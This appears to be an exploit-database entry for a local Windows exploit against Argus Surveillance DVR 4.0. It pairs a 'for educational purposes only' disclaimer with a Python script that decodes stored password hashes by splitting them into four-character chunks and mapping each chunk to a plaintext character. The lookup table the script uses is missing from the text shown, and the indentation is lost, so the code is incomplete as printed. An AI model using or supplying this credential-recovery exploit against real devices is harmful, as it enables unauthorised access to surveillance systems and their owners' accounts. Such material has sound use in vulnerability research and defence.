Exploits / Vulnerability Discovered : 2021-07-16 |
Type : local |
Platform : windows
This exploit / vulnerability Argus surveillance dvr 4.0 weak password encryption is for educational purposes only and if it is used you will do on your own risk!
# Change this :)
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"
if (len(pass_hash)%4) != 0:
print("[!] Error, check your password hash")
exit()
split = []
n = 4
for index in range(0, len(pass_hash), n):
split.append(pass_hash[index : index + n])
for key in split:
if key in characters.keys():
print("[+] " + key + ":" + characters[key])
else:
print("[-] " + key + ":Unknown")